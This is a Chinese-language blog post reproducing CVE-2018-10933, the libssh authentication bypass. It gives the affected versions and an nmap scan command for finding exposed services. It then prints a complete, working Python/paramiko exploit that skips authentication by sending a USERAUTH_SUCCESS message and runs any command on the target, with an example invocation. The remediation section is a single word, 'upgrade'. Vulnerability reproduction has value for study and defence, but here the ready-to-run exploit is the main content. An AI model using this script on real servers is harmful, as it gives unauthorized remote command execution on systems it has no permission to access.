首页 > 其他分享 >Libssh认证绕过CVE-2018-10933漏洞复现

Libssh认证绕过CVE-2018-10933漏洞复现

时间:2023-06-13 22:23:58浏览次数:52  
标签:libssh logging paramiko Libssh client 2018 message CVE transport

0x00漏洞描述

libssh 0.6 及以上的版本,在服务端的代码实现中存在身份认证绕过漏洞。在向服务端认证的流程中,攻击者通过将 SSH2_MSG_USERAUTH_REQUEST 消息替换为 SSH2_MSG_USERAUTH_SUCCESS,即可在无需任何有效凭证的情况下认证成

 

0x01 漏洞影响版本

libssh 0.8.x - 0.8.3

libssh 0.7.x - 0.7.5

libssh 0.6.x

 

0x02 漏洞检测

1.nmap扫描libssh版本

nmap  -p  2222  -n -Pn   -T5  -sC -sV  1xxx

 fofa

 2.复现脚本

#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()
        
        #return output.decode()
        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))
python libssh.py 1.xx.xx.xx  2222 "id"

 

0x04 解决方案

 

升级

标签:libssh,logging,paramiko,Libssh,client,2018,message,CVE,transport
From: https://www.cnblogs.com/lyh1/p/17478846.html

相关文章

  • Apache Http Server 路径穿越漏洞复现(CVE-2021-41773)
    ApacheHttpServer路径穿越漏洞复现ApacheHttpServer路径穿越漏洞概述ApacheHttpServer简介ApacheHTTPServer(简称Apache)是Apache软件基金会的一个开放源码的网页服务器软件,可以在大多数电脑操作系统中运行。由于其跨平台和安全性,被广泛使用,是最流行的Web服务器......
  • 【高危】 Apache Kafka 远程代码执行漏洞复现及攻击拦截 (CVE-2023-25194)
    漏洞简介ApacheKafka是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。KafkaConnect是一种用于在kafka和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于SASLJAAS配置和SASL协议的任意Kafka客户端,对KafkaConnectworker创建或修改连接器......
  • Docker runc容器逃逸漏洞(CVE-2021-30465)
    --原文件的名称并授权cd/tmpmvrunc.amd64runc&&chmod+xrunc--查看runc的位置whichrunc--将备份runc文件cd/usr/bincpruncrunc.bak--复制新的runc到usr/bincp/tmp/runc/usr/bin/systemctlstopdockersystemctlstartdocker......
  • [NOI2018] 你的名字
    给定串\(S,T_{1,\cdots,q}\),每次询问是\(S[l_i,r_i]\)的子串但不是\(T_i\)的子串的本质不同子串个数。\(|S|\le5e5,q\le1e5,\sum|T|\le1e6\)。我们先考虑\(l=1,r=|S|\)怎么做。显然我们使用SAM可以简单计算出\(T_i\)的本质不同子串数,那么我们肯定想算出来\(S\)......
  • Luogu P4591 [TJOI2018]碱基序列
    [TJOI2018]碱基序列题目描述小豆参加了生物实验室。在实验室里,他主要研究蛋白质。他现在研究的蛋白质是由\(k\)个氨基酸按一定顺序构成的。每一个氨基酸都可能有\(a\)种碱基序列\(s_{i,j}\)构成。现在小豆有一个碱基串\(s\),小豆想知道在这个碱基上都多少中不同的组合方式可能得......
  • Luogu P4577 [FJOI2018] 领导集团问题
    [FJOI2018]领导集团问题题目描述一个公司的组织领导架构可以用一棵领导树来表示。公司的每个成员对应于树中一个结点\(v_i\),且每个成员都有响应的级别\(w_i\)。越高层的领导,其级别值\(w_i\)越小。树中任何两个结点之间有边相连,则表示与结点相应的两个成员属于同一部门。领......
  • JSOI2018 部分题解
    目录潜入行动防御网络列队潜入行动一眼直接DP。设\(f_{i,j,0/1,0/1}\)表示\(i\)子树内放了\(j\)个监听设备,\(i\)是否被子结点覆盖,\(i\)是否放了监听设备,\(i\)子树内除了\(i\)都被覆盖的方案数。转移是一个树形背包,时间复杂度\(\mathcal{O}(nk)\),只是常数有点大。......
  • 中国公有云厂商2018年收入利润综合排名
      他们说:看过排名更懂云了…… 做这个排名之前,首先需要说明一下这次估算和统计的公有云供应商的业务范围,包括了这些云供应商的公有云、CDN、IDC、私有云、混合云、与云相关的集成项目,共计六项主要的业务,只要存在这六项业务,那么阿明都力争统计在里面,对于那些不具备这六项业务的公......
  • Luogu P5446 [THUPC2018] 绿绿和串串
    根据题目能发现一个性质,设转化前的字符串为\(s\),转化后的字符串为\(s'\),则\(s'_{|s|}\)为\(s'\)的中心,即\(s'_{|s|}\)求出来的回文串左边界为\(1\)右边界为\(|s'|\)找出这个性质就挺简单了,考虑先对给出的\(S\)用\(\text{manacher}\)求出每个节点\(i\)对应的左边......
  • 程序员小灰2018年整理
    比较喜欢小灰灰系列,在此整理下便于查看。漫画:什么是八皇后问题?漫画:什么是字典序算法?漫画:如何实现抢红包算法?漫画:什么是拜占庭将军问题?漫画:有趣的扔鸡蛋问题漫画:动态规划解决扔鸡蛋问题漫画:什么是冒泡排序?漫画:什么是鸡尾酒排序?(修订版)漫画:什么是快速排序?(完整版)漫画:什么是时间复杂度?漫......